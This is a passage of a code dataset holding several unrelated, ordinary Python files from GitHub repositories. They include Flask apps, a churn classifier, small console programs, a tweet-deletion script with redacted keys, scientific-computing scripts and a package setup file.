current_user.liked_playlists:\n current_user.liked_playlists.remove(playlist.uuid)\n current_user.save()\n playlist.likes = playlist.likes - 1\n playlist.save()\n return redirect(url_for('playlists.view', uuid=playlist.uuid))\n else:\n current_user.liked_playlists.append(playlist.uuid)\n current_user.save()\n playlist.likes += 1\n playlist.save()\n return redirect(url_for('playlists.view', uuid=playlist.uuid))\n \n@playlists.route('/about', methods=['GET', 'POST'])\ndef about():\n return render_template('about.html', title=\"About\")","repo_name":"unrealJune/388JFinal","sub_path":"flask_app/playlists/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74842057470","text":"import pandas as pd\nimport numpy as np\nfrom collections import Counter \nimport matplotlib.pyplot as plt\nimport datetime as dt\nfrom sklearn import preprocessing\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.metrics import accuracy_score, 
confusion_matrix, precision_score, recall_score, roc_auc_score, roc_curve, f1_score\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.utils import resample\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.linear_model import LogisticRegression\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import metrics\n\n\n\npath='/Users/dulinna/LDProjects/pickingstock/RobinHood_Test'\nstart = dt.date(2016,8, 16)\nend = dt.date(2017,8, 17)\nequity_value_data = pd.read_csv(path +\"/equity_value_data.csv\")\nfeatures_data = pd.read_csv(path +\"/features_data.csv\")\n\nprint('(a) The percentage of Users have churned in the data provided')\n# parse the time step to find the date \nequity_value_data['date'] = equity_value_data['timestamp'].apply (lambda x : x.split('T')[0])\nequity_value_data.drop(columns = ['timestamp'], inplace = True)\nequity_value_groupby = equity_value_data.groupby(['user_id'])\n'''\ncalculate the gap between the data collection data and the last date the user is acctive\nAsume that when the user acount is not in the dataset, the user is churned\nalso calculate the equity volatilty, portfolio changes for each user during the time period\n'''\nall = pd.DataFrame(columns = ['user_id','fist_day', 'last_day', 'days_gap', 'close_equity', 'first_last_day_changes_pct', 'equity_volatility'])\nfor k, v in equity_value_groupby:\n v.sort_values(by = ['date'])\n firstday = min(v['date'])\n y,m,d = max(v['date']).split('-')\n lastday = dt.date(int(y), int(m), int(d))\n gap = (end - lastday).days\n ininital_euity = v[v.date == min(v['date']) ]['close_equity'].values[0]\n close_equity = v[v.date == max(v['date']) ]['close_equity'].values[0]\n equity_changes_pct = (close_equity - ininital_euity)%ininital_euity\n vol = np.std( np.log(v['close_equity']/v['close_equity'].shift(-1)) )*252**0.5\n all = (all.append({'user_id': k,'fist_day': firstday, 'last_day':lastday, 'close_equity':close_equity, 'days_gap': gap,\n 'first_last_day_changes_pct':equity_changes_pct, 'equity_volatility': vol },\n ignore_index = True)) \naa = all\nchurn = all[all.days_gap >= 28]\nno_churn = all[all.days_gap < 28]\nprint(\"the churn rate in % is\")\nchurnedrate = len(churn)/len(all) * 100\nprint(churnedrate)\n\nprint('b) build a classifer')\n\ndata = all.merge(features_data, how = 'left', on ='user_id')\ndata['acount_changes'] = (data.close_equity - data.first_deposit_amount)/data.first_deposit_amount * 100\ndata['Churn_or_not'] = [1 if i >= 28 else 0 for i in data['days_gap']]\ndata.replace([np.inf, -np.inf], np.nan, inplace=True)\ndata.dropna(inplace = True)\n\ny = data['Churn_or_not']\nreduced = ['liquidity_needs', 'instrument_type_first_traded', 'platform', 'time_horizon']\ndata.drop(columns = ['user_id', 'fist_day', 'last_day', 'days_gap', 'close_equity', 'Churn_or_not'], inplace = True)\nX = data\ncategorical_data = ['risk_tolerance','investment_experience', 'liquidity_needs', 'instrument_type_first_traded', 'platform', 'time_horizon']\nnumerical_data = ['time_spent','acount_changes', 'equity_volatility', 'first_last_day_changes_pct', 'first_deposit_amount']\n\n# deal with categorial data\ncol_trans = make_column_transformer(\n (OneHotEncoder(),categorical_data),\n remainder = \"passthrough\"\n )\n\n\n\n\nrf_classifier = RandomForestClassifier()\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, train_size=0.8, random_state=50, shuffle=True, stratify=None)\nX_train = X_train.fillna('na')\nX_test = X_test.fillna('na')\n\n## upscale 
sampling\nX_train_y = X_train\nX_train_y['y'] = y_train\nminority = X_train_y[X_train_y.y ==1]\nmajority = X_train_y[X_train_y.y ==0]\nminority_upsampled = resample(minority,\n replace = True,\n n_samples = majority.shape[0],\n random_state = 123)\ndf_upsampled = pd.concat([minority_upsampled, majority])\ny_train = df_upsampled['y']\nX_train = df_upsampled.drop(columns = ['y'])\n\n# train with logistic regression\n\nlogistic_classifier = LogisticRegression()\npipe_logit = make_pipeline(col_trans, logistic_classifier)\npipe_logit.fit(X_train, y_train)\ny_pred_logist = pipe_logit.predict(x_test)\nscore = pipe_logit.score(X_test, y_test)\nprint(score)\n'''\n#train model with simple RF\n#\nseed = 50\nrf_classifier = RandomForestClassifier(\n min_samples_leaf=50,\n n_estimators=150,\n bootstrap=True,\n oob_score=True,\n n_jobs=-1,\n random_state=seed,\n max_features='auto')\npipe = make_pipeline(col_trans, rf_classifier)\npipe.fit(X_train, y_train)\n\n\n# grid search and cross validation\nfrom sklearn.model_selection import GridSearchCV\nparam_grid = {'n_estimators': [int(x) for x in np.linspace(start = 100, stop = 300, num = 50)],\n 'max_features': ['auto', 'log2'],\n 'max_depth': [3, 5],\n 'min_samples_split': [2, 5, 10],\n 'min_samples_leaf': [1, 4, 10],\n 'max_leaf_nodes': [None] + list(np.linspace(10, 50, 100).astype(int)),\n 'bootstrap': [True, False], \n 'n_jobs': [-1]\n \n }\nrf_tune = RandomForestClassifier(oob_score=True, n_jobs = -1)\nrandom_rf = RandomizedSearchCV(\n estimator = rf_tune,\n param_distributions = param_grid,\n verbose = 2,\n random_state=seed,\n cv=3,\n scoring='roc_auc')\n\npipe_random = make_pipeline(col_trans, random_rf)\npipe_random.fit(X_train, y_train)\n# cross validation\nrandom_rf.best_params_\nbest_model = random_rf.best_estimator_\npipe_best_model = make_pipeline(col_trans, best_model)\npipe_best_model.fit(X_train, y_train)\ny_pred_best_model = pipe_best_model.predict(X_test)\ntrain_rf_predictions = pipe_best_model.predict(X_train)\ntrain_rf_probs = pipe_best_model.predict_proba(X_train)[:, 1]\nrf_probs = pipe_best_model.predict_proba(X_test)[:, 1]\naccuracy_score(y_test, y_pred)\nprint(f\"The accuracy of the model is {round(accuracy_score(y_test,y_pred_best_model ),3)*100} %\")\nprint(f'Train ROC AUC Score: {roc_auc_score(y_train, train_rf_probs)}')\nprint(f'Test ROC AUC Score: {roc_auc_score(y_test, rf_probs)}')\n\n\n'''\ny_pred = pipe.predict(X_test)\n\n\n\n\n'''https://towardsdatascience.com/my-random-forest-classifier-cheat-sheet-in-python-fedb84f8cf4f'''\n","repo_name":"linnadu/MachineLearning-","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13781635437","text":"import constants\r\nimport string\r\n\r\n\r\ndef main():\r\n print(\"BASKETBALL TEAM STATS TOOL\")\r\n balance_teams()\r\n main_menu()\r\n\r\n\r\ndef main_menu():\r\n while True:\r\n menu_options = [\"1\", \"Q\"]\r\n print(\"\\n\\n<<< MAIN MENU >>>\\n\\n\")\r\n print(\"Select an option below:\\n\")\r\n print(\" 1) Display Team Stats\")\r\n print(\" Q) Quit\")\r\n print(\"\")\r\n menu_selection = input(\"Enter an option >> \").upper()\r\n if menu_selection not in menu_options:\r\n print(\"Invalid selection, try again.\")\r\n continue\r\n else:\r\n menu_choice(menu_selection)\r\n\r\n\r\ndef menu_choice(selection):\r\n if selection == \"1\":\r\n team_selection_menu()\r\n if selection == \"Q\":\r\n print(\"Exiting application...\")\r\n 
quit()\r\n\r\n\r\ndef team_selection_menu():\r\n while True:\r\n menu_options = {}\r\n selected_team = {}\r\n options = [str(x) for x in list(range(1, 101))]\r\n print(\"\")\r\n print(\"Select a team to view:\")\r\n print(\"\")\r\n for index, team in enumerate(rosters):\r\n menu_options[options[index]] = team\r\n print(\"{}) {}\".format(options[index], team))\r\n print(\"\")\r\n print(\"{}) {}\".format(\"M\", \"Main Menu\"))\r\n print(\"{}) {}\".format(\"Q\", \"Quit\"))\r\n\r\n print(\"\")\r\n menu_selection = input(\"Enter an option >> \").upper()\r\n if menu_selection == \"M\":\r\n main_menu()\r\n break\r\n if menu_selection == \"Q\":\r\n print(\"Exiting application...\")\r\n quit()\r\n if menu_selection not in menu_options:\r\n print(\"Invalid selection, try again.\")\r\n continue\r\n else:\r\n selected_team[menu_options[menu_selection]] = rosters[menu_options[menu_selection]]\r\n display_team(selected_team)\r\n input(\"Press ENTER to continue...\")\r\n continue\r\n\r\n\r\ndef balance_teams():\r\n teams = load_teams_data()\r\n players = load_players_data()\r\n players_per_team = (len(players) // len(teams))\r\n experienced_players = [d for d in players if d['experience']]\r\n inexperienced_players = [d for d in players if not d['experience']]\r\n\r\n for team in teams:\r\n temp_players = []\r\n while len(temp_players) < players_per_team:\r\n temp_players.append(experienced_players.pop())\r\n temp_players.append(inexperienced_players.pop())\r\n rosters[team] = temp_players\r\n return rosters\r\n\r\n\r\ndef display_team(team):\r\n team_name = list(team.keys())[0]\r\n players = \", \".join([player[\"name\"] for player in team[team_name]])\r\n guardians = \", \".join([x for l in [player[\"guardians\"] for player in team[team_name]] for x in l])\r\n avg_height = round(\r\n sum([player[\"height\"] for player in team[team_name]]) / len([player[\"name\"] for player in team[team_name]]), 2)\r\n experienced_count = sum([player[\"experience\"] for player in team[team_name]])\r\n inexperienced_count = len(team[team_name]) - experienced_count\r\n print(\"\")\r\n header = f\"Team: {team_name} Stats\"\r\n print(header)\r\n print(\"-\" * len(header))\r\n print(\"Total players: {}\".format(len(team[team_name])))\r\n print(\"Total experienced: {}\".format(experienced_count))\r\n print(\"Total inexperienced: {}\".format(inexperienced_count))\r\n print(\"Average height: {}\".format(avg_height))\r\n print(\"\")\r\n print(\"Players on Team:\")\r\n print(\" {}\".format(players))\r\n print(\"\")\r\n print(\"Guardians:\")\r\n print(\" {}\".format(guardians))\r\n print(\"\")\r\n\r\n\r\ndef load_teams_data():\r\n teams = []\r\n teams = constants.get_teams()\r\n return teams\r\n\r\n\r\ndef load_players_data():\r\n players = []\r\n players = constants.get_players()\r\n cleaned_players = clean_players(players)\r\n return cleaned_players\r\n\r\n\r\ndef clean_players(data):\r\n cleaned = []\r\n for player in data:\r\n fixed = {\"name\": player[\"name\"], \"guardians\": player[\"guardians\"].split(\" and \")}\r\n if player[\"experience\"] == \"YES\":\r\n fixed[\"experience\"] = True\r\n else:\r\n fixed[\"experience\"] = False\r\n fixed[\"height\"] = int(player[\"height\"].split(\" \")[0])\r\n cleaned.append(fixed)\r\n return cleaned\r\n\r\n\r\nif __name__ == \"__main__\":\r\n rosters = {}\r\n 
main()\r\n","repo_name":"pjregis/teamtreehouse-python-project2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32423859982","text":"#定义一个用于存放学员信息的列表变量\nstulist=[\n {'name':'zhangxiaogang','age':20,'classid':'pyton01'},\n {'name':'wanppeng','age':26,'classid':'pyton02'},\n {'name':'lixia','age':19,'classid':'pyton08'}]\n\n#定义一个学生信息的输出函数\ndef showstu(stulist):\n ...\n '学员信息的输出函数'\n ...\n\n if len(stulist)==0:\n print('=========== 没有学员信息可以输出!===========')\n return\n print('|{0:<10}| {1:<20}| {2:<20}| {3:<20}|'.format('sid','name','age','classid'))\n print('-' *40)\n for i in range(len(stulist)):\n print('|{0:<10}| {1:<20}| {2:<20}| {3:<20}|'.format(i+1,stulist[i]['name'],stulist[i]['age'],stulist[i]['classid']))\n\nwhile True:\n # 输出初始界面\n print('=' *12,'学员管理系统','=' *14)\n print('{0:1} {1:13} {2:15}'.format(' ', '1. 查看学员信息','2.添加学员信息'))\n print('{0:1} {1:13} {2:15}'.format(' ', '3. 删除学员信息','4.退出系统'))\n print('='*40)\n key = input('请输入对应读选择:')\n # 根据键盘值,判断并执行对应的操作\n if key == '1':\n print('=' *12,'学员信息浏览','='*14)\n showstu(stulist)\n input('按回车继续:')\n\n elif key == '2':\n print('=' *12,'学员信息添加','='*14)\n stu={}\n stu['name']=input('请输入要添加的姓名:')\n stu['age'] = input('请输入要添加的年龄:')\n stu['classid'] = input('请输入要添加的班级号:')\n stulist.append(stu)\n showstu(stulist)\n input('按回车继续:')\n\n elif key == '3':\n print('=' *12,'学员信息删除','='*14)\n showstu(stulist)\n sid = input('请删除你要删除的信息ID号:')\n del stulist[int(sid)-1]\n input('按回车继续:')\n elif key == '4':\n print('=' *12,'再见','='*14)\n break\n else:\n print('=========无效的键盘输入!==========')","repo_name":"jasoncheung1/untitled","sub_path":"学员信息在线管理.py","file_name":"学员信息在线管理.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36779776989","text":"import base64\nimport sys\n\nimport requests\n\nfrom jinja2 import Template\nfrom panoptes_client import Project\n\n\nproject = Project.find(slug=sys.argv[-1])\n\nposter_info = {\n 'image_name': '{}-poster.svg'.format(project.slug.replace('/','-')),\n 'avatar_b64': base64.b64encode(\n requests.get(project.avatar['media'][0]['src']).content\n ),\n 'avatar_type': project.avatar['media'][0]['content_type'],\n}\n\nposter_info.update(project.raw)\n\nwith open('template.svg') as template_f:\n template = Template(template_f.read())\n\nwith open(poster_info['image_name'], 'w') as out_f:\n out_f.write(template.render(**poster_info))\n","repo_name":"zooniverse/project-poster-generator","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24206189907","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndim1 = 20\ndim2 = 20\n\nstrategies = np.load(\"results/grid_strategies.npz\")\n\nfc = list()\n\nfor i in range(len(strategies['g1'])):\n fc.append(np.mean(strategies['g1'][i]))\n\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\n\nax.plot(fc)\nplt.show()","repo_name":"jmiszczak/evolving-games","sub_path":"models/prosocial/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"1332455387","text":"import tweepy, json\n\n# Authenticate to Twitter\nauth = tweepy.OAuthHandler(\"REDACTED\", 
\"REDACTED\")\nauth.set_access_token(\"REDACTED\", \"REDACTED\")\n\napi = tweepy.API(auth)\n'''\n# To test access to Twitter\ntry:\n\tapi.verify_credentials()\n\tprint(\"Authentication OK\")\nexcept tweepy.TweepError as error:\n\tprint(\"Error during authentication\")\n\tprint(error.reason)\napi.update_status(\"test tweet\")\n'''\n\n# Counters for fun and data\ndeleted_tweets = 0\nfailed_deletion = 0\nunaffected_tweets = 0\n\nfile = open(\"tweet.js\",\"r\")\nmyjson = json.load(file)\n# print(repr(myjson)) # to confirm that json file is read in as a list\n\ntext_substr = 'the ' # keyword. need to have a space after it to prevent things like \"they\" bc it's a string. case-sensitive.\n\ndef tweet_matches(tweet, full_text_substr):\n\ttweet = tweet['tweet'] # parse individual tweet dictionary as a list\n\tfull_text_matches = full_text_substr in tweet ['full_text'] # search full-text key:value for substring\n\treturn full_text_matches\n\nqualifying_tweets = [t for t in myjson if tweet_matches(t, text_substr)]\n\n#print(*qualifying_tweets, sep=\"\\n\") # this will print entire dicts for each matching tweet\n\nfor tweet in qualifying_tweets:\n\tfull_text = tweet.get(\"tweet\").get(\"full_text\")\n\tcreated_at = tweet.get(\"tweet\").get(\"created_at\")\n\tin_reply_to_screen_name = tweet.get(\"tweet\").get(\"in_reply_to_screen_name\",\"[none]\") # not all tweets are replies\n\t#print(f\"{full_text}\" + ' created at' + f\"{created_at}\")\n\n\tprint(full_text + ' created at' + created_at + ' will be deleted')\n\ttry:\n\t\t#print(f\"{full_text}\" + ' created at' + f\"{created_at}\")\n\t\tapi.destroy_status(tweet['tweet']['id_str'])\n\texcept (tweepy.error.TweepError):\n\t\tprint('Error destroying due to ', tweepy.error.TweepError)\n\t\tfailed_deletion +=1\n\ttry:\n\t\t#print(f\"{full_text}\" + ' created at' + f\"{created_at}\")\n\t\tapi.get_status(tweet[\"tweet\"][\"id_str\"])\n\texcept (tweepy.error.TweepError):\n\t\tprint(f\"{full_text}\" + ' created at' + f\"{created_at}\"+ ' ' + tweet[\"tweet\"][\"id_str\"] + ' successfully deleted')\n\t\tdeleted_tweets +=1\n\telse:\n\t\tfailed_deletion +=1\n\nunaffected_tweets = len(myjson) - len(qualifying_tweets)\n\nprint('Total deleted tweets = ', deleted_tweets)\nprint('Total failed deletion = ', failed_deletion)\nprint('Total unaffected tweets = ', unaffected_tweets)\n","repo_name":"gobborg/delete-tweets-by-keyword","sub_path":"keyword.py","file_name":"keyword.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34595739249","text":"import sys\n\nfrom pyomo.environ import SolverFactory\nfrom mpisppy.utils.pysp_model import PySPModel\nfrom mpisppy.opt.ph import PH\n\ndef _print_usage():\n print('Usage: \"farmer_pysp.py solver\" where solver is a pyomo solver name')\nif len(sys.argv) < 2:\n _print_usage()\n sys.exit()\ntry:\n solver_avail = SolverFactory(sys.argv[1]).available()\n if not solver_avail:\n print(f\"Cannot find solver {sys.argv[1]}\")\n sys.exit()\nexcept:\n print(f\"Cannot find solver {sys.argv[1]}\")\n _print_usage()\n sys.exit()\n\nfarmer = PySPModel(scenario_creator='./PySP/concrete/ReferenceModel.py',\n tree_model='./PySP/ScenarioStructure.dat')\n\nphoptions = {'defaultPHrho': 1.0,\n 'solvername':sys.argv[1],\n 'PHIterLimit': 50,\n 'convthresh': 0.01,\n 'verbose': False,\n 'display_progress': True,\n 'display_timing': False,\n 'iter0_solver_options': None,\n 'iterk_solver_options': None\n }\n\nph = PH( PHoptions = phoptions,\n 
all_scenario_names = farmer.all_scenario_names,\n scenario_creator = farmer.scenario_creator,\n scenario_denouement = farmer.scenario_denouement,\n )\n\nph.ph_main()\n","repo_name":"GuillaumeGoujard/mpi-sppy","sub_path":"mpisppy/examples/farmer/farmer_pysp.py","file_name":"farmer_pysp.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31579859193","text":"price = 50\npaid = 0\ntpaid = 0\nbalance = price - tpaid\n\nwhile paid < price:\n paid = int(input(\"Insert Coin: \"))\n if paid in [5,10,25]:\n tpaid = tpaid + paid\n balance = price - tpaid\n if balance > 0:\n print (f\"Amount Due: {balance}\")\n else:\n balance = -(balance)\n print (f\"Change Owed: {balance}\")\n break\n else:\n print (f\"Amount Due: {balance}\")\n","repo_name":"naveenclgit/edurekapgops","sub_path":"CS50P/coke/coke.py","file_name":"coke.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8572485405","text":"\n\nfrom datetime import datetime\nfrom flask_restplus import Resource, reqparse, fields, Namespace\n\nfrom dateutil.parser import parse as datetime_parser\nfrom werkzeug.datastructures import FileStorage\n\nfrom chanakya.src import db, app\nfrom chanakya.src.models import Student, QuestionAttempts, QuestionSet\n\nfrom chanakya.src.helpers.response_objects import question_set\nfrom chanakya.src.helpers.file_uploader import upload_file_to_s3, FileStorageArgument\nfrom chanakya.src.helpers.task_helpers import render_pdf_phantomjs, get_attempts, get_dataframe_from_csv\nfrom chanakya.src.helpers.validators import check_csv\n\napi = Namespace('offline_test', description='Handle complete offline test of students')\n\n\n@api.route('/offline_paper')\nclass OfflinePaperList(Resource):\n post_payload_model = api.model('POST_offline_paper', {\n 'number_sets':fields.Integer(required=True),\n 'partner_name':fields.String(required=True)\n })\n\n offline_paper_response = api.model('offline_paper_response', {\n 'error': fields.Boolean(default=False),\n 'data':fields.List(fields.Nested(question_set))\n })\n\n @api.marshal_with(offline_paper_response)\n @api.expect(post_payload_model)\n def post(self):\n args = api.payload\n\n number_sets = args.get('number_sets')\n partner_name = args.get('partner_name')\n\n set_list = []\n\n for i in range(number_sets):\n try:\n # generate the random sets and get question\n set_name = chr(ord('A') + i)\n set_instance, questions = QuestionSet.create_new_set(partner_name, set_name)\n # render pdf\n question_pdf = render_pdf_phantomjs('question_pdf.bkp.html', set_instance=set_instance, questions=questions)\n answer_pdf = render_pdf_phantomjs('answer_pdf.html', set_instance=set_instance, questions=questions)\n\n #s3 method that upload the binary file\n question_pdf_s3_url = upload_file_to_s3(bucket_name = app.config['S3_QUESTION_IMAGES_BUCKET'], string=question_pdf, filename_extension='pdf')\n answer_pdf_s3_url = upload_file_to_s3(bucket_name = app.config['S3_QUESTION_IMAGES_BUCKET'], string=answer_pdf, filename_extension='pdf')\n\n print(question_pdf_s3_url)\n print(answer_pdf_s3_url)\n\n # # update url of question_set\n set_instance.question_pdf_url = question_pdf_s3_url\n set_instance.answer_pdf_url = answer_pdf_s3_url\n db.session.add(set_instance)\n db.session.commit()\n\n set_list.append(set_instance)\n except Exception as e:\n raise e\n\n print(set_list)\n # return each and every 
question_set\n return {\n 'data': set_list\n }\n\n @api.marshal_with(offline_paper_response)\n def get(self):\n\n set_instance = QuestionSet.query.filter(QuestionSet.partner_name != None).all()\n if set_instance:\n return {\n 'data': set_instance\n }\n return{\n 'error':True,\n 'message':'No set generated for any partner till yet.'\n }\n\n@api.route('/offline_paper/')\nclass OfflinePaper(Resource):\n\n get_response = api.model('GET_offline_paper_id_response', {\n 'error': fields.Boolean(default=False),\n 'data': fields.Nested(question_set),\n 'message':fields.String,\n })\n\n @api.marshal_with(get_response)\n def get(self, id):\n\n set_instance = QuestionSet.query.filter_by(id=id).first()\n if set_instance:\n return {\n 'data': set_instance\n }\n\n return {\n 'message':\"Set doesn't exist\",\n 'error':True\n }\n\n@api.route('/offline_paper/upload_results')\nclass OfflineCSVUpload(Resource):\n\tpost_parser = reqparse.RequestParser(argument_class=FileStorageArgument)\n\tpost_parser.add_argument('partner_csv', required=True, type=FileStorage, location='files')\n\n\t@api.doc(parser=post_parser)\n\tdef post(self):\n\t\targs = self.post_parser.parse_args()\n\t\tcsv = args.get('partner_csv')\n\n\t\t# check image file extension\n\t\textension = csv.filename.rsplit('.', 1)[1].lower()\n\t\tif '.' in csv.filename and not extension == 'csv':\n\t\t\tabort(400, message=\"File extension is not one of our supported types.\")\n\n\t\t# upload to s3\n\t\tcsv_url = upload_file_to_s3(bucket_name=app.config['S3_QUESTION_IMAGES_BUCKET'], file=csv)\n\n\t\treturn {'csv_url': csv_url}\n\n\n@api.route('/offline_paper/compute_results')\nclass OfflineCSVProcessing(Resource):\n invalid_offline_attempts = api.model('invalid_offline_attempts',{\n 'student_row': fields.Integer,\n 'invalid_mcq_question_numbers': fields.List(fields.Integer),\n 'message': fields.String\n })\n post_payload_model = api.model('POST_add_results', {\n 'csv_url': fields.String\n })\n\n post_response = api.model('POST_add_results_response', {\n 'error':fields.Boolean(default=False),\n 'success':fields.Boolean(default=False),\n 'invalid_rows': fields.List(fields.Nested(invalid_offline_attempts)),\n 'record_added': fields.Integer\n })\n\n @api.marshal_with(post_response)\n @api.expect(post_payload_model, validate=True)\n def post(self):\n args = api.payload\n\n # creating a dataframe of the csv_url\n student_rows = get_dataframe_from_csv(args.get('csv_url'))\n\n # CSV Validation\n invalid_rows = check_csv(student_rows)\n if invalid_rows:\n return {\n 'error':True,\n 'invalid_rows': invalid_rows,\n }\n\n record_added_to_chanakya = 0\n\n # Adding each student from CSV DataFrame to chanakya\n for row in student_rows:\n student_data = {}\n stage = 'ETA'\n\n student_data['name'] = row.get('Name')\n student_data['gender'] = app.config['GENDER'](row.get('Gender').upper())\n student_data['dob'] = datetime_parser(row.get('Date of Birth'))\n student_data['religion'] = app.config['RELIGION'](row.get('Religion'))\n student_data['caste'] = app.config['CASTE'](row.get('Caste'))\n\n main_contact = row.get('Main Contact')\n alternative_contact = row.get('Alternative Contact')\n\n set_id = int(row.get('Set ID'))\n set_instance = QuestionSet.query.get(set_id)\n\n # creating the student, student_contact and an enrollment_key for the student with set_id\n student, enrollment = Student.offline_student_record(stage, student_data, main_contact, alternative_contact, set_instance)\n attempts = get_attempts(row, enrollment) # this get all the attempts made by student\n 
QuestionAttempts.create_attempts(attempts, enrollment) #storing the attempts to the database\n enrollment.calculate_test_score() #calculating the score of the student\n\n record_added_to_chanakya += 1\n\n return {\n 'success':True,\n 'record_added': record_added_to_chanakya\n }\n","repo_name":"amarkrsinha1997/MCQ-Testing-Platform","sub_path":"src/routes/offline_test.py","file_name":"offline_test.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4248506777","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 12 14:38:48 2018\n\n@author: haiau\n\"\"\"\n\nimport Mesh.FEMMesh as FM\nimport InOut.FEMOutput as FO\nimport Mesh.FEMNode as FN\nimport numpy as np\nimport pylab as pl\nimport matplotlib.ticker as ticker\n\nfldrn = '/media/haiau/Data/PyFEM_Results/result_linear_ndiv_'\n\nNdof = 2\ntOrder = 2\n\nndiv = [1,2,4,8]\nres = []\n\nfor n in ndiv:\n filen = fldrn + str(n)+'.dat'\n print('reading data file: '+filen)\n res100,_ = FO.StandardFileOutput.readOutput(filen,val='x')\n resx = res100.tolist()\n nodes = []\n for x in resx:\n nodes.append(FN.Node(x,Ndof,timeOrder=tOrder))\n _,inode = FM.findNodeNearX(nodes,np.array([0.015,-0.1,0.0]))\n testout,tout = FO.StandardFileOutput.readOutput(filen,timeStep='all',node=inode,val='u')\n rest = [t[0][0] for t in testout]\n res.append(np.array(rest))\n \nerr = [] \n \nfor i,n in enumerate(ndiv[0:-1]):\n err.append(np.linalg.norm(res[i+1]-res[i])/np.linalg.norm(res[i+1]))\n \n#pl.plot(ndiv[0:-1],err) \npl.plot(ndiv,np.array(res)[:,200],'-x')\npl.gca().yaxis.set_major_formatter(ticker.FormatStrFormatter('%0.2e')) \n#testres,t = FO.StandardFileOutput.readOutput(filen,list(range(100)),val='u')\n\n\n","repo_name":"haiaubui/PyFEM","sub_path":"Tests/test_post_processing_1.py","file_name":"test_post_processing_1.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"60"} +{"seq_id":"9750950198","text":"# You have been given two sets containing BIT courses. 
Use the\n# following hints to display the expected output:\n#\n# - Use the set method which returns the difference of two or more\n# sets as a new set\n# - Use the set method which returns the union of sets as a new set\n\ncourses_one = {'Intro App Dev Concepts', 'Programming 2',\n 'Studio 1', 'Sys Admin'}\ncourses_two = {'Int App Dev Concepts', 'Mobile App Dev',\n 'Studio 1', 'Sys Admin'}\n\n# Write your solution here\n\n# Expected output:\n# {'Intro App Dev Concepts', 'Programming 2'}\n# {'Sys Admin', 'Programming 2', 'Intro App Dev Concepts', 'Mobile App Dev', 'Studio 1', 'Int App Dev Concepts'}\n","repo_name":"tclark/op-intermediate-app-dev","sub_path":"03-data-types/practical-03/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"29570049742","text":"import os\n\nfrom setuptools import find_packages, setup\n\nDISTNAME = 'xesmf'\nDESCRIPTION = 'Universal Regridder for Geospatial Data'\nAUTHOR = 'Jiawei Zhuang'\nAUTHOR_EMAIL = 'jiaweizhuang@g.harvard.edu'\nURL = 'https://github.com/pangeo-data/xESMF'\nLICENSE = 'MIT'\nPYTHON_REQUIRES = '>=3.6'\nUSE_SCM_VERSION = {\n 'write_to': 'xesmf/_version.py',\n 'write_to_template': '__version__ = \"{version}\"',\n 'tag_regex': r'^(?Pv)?(?P[^\\+]+)(?P.*)?$',\n}\n\n# https://github.com/rtfd/readthedocs.org/issues/5512#issuecomment-475024373\non_rtd = os.environ.get('READTHEDOCS') == 'True'\nif on_rtd:\n INSTALL_REQUIRES = []\nelse:\n INSTALL_REQUIRES = [\n 'esmpy>=8.0.0',\n 'xarray>=0.16.2',\n 'numpy>=1.16',\n 'shapely',\n 'cf-xarray>=0.5.1',\n 'sparse>=0.8.0',\n 'numba',\n ]\n\nCLASSIFIERS = [\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Intended Audience :: Science/Research',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Scientific/Engineering',\n]\n\n\ndef readme():\n with open('README.rst') as f:\n return f.read()\n\n\nsetup(\n name=DISTNAME,\n license=LICENSE,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n classifiers=CLASSIFIERS,\n description=DESCRIPTION,\n long_description=readme(),\n long_description_content_type='text/x-rst',\n python_requires=PYTHON_REQUIRES,\n install_requires=INSTALL_REQUIRES,\n url=URL,\n packages=find_packages(),\n 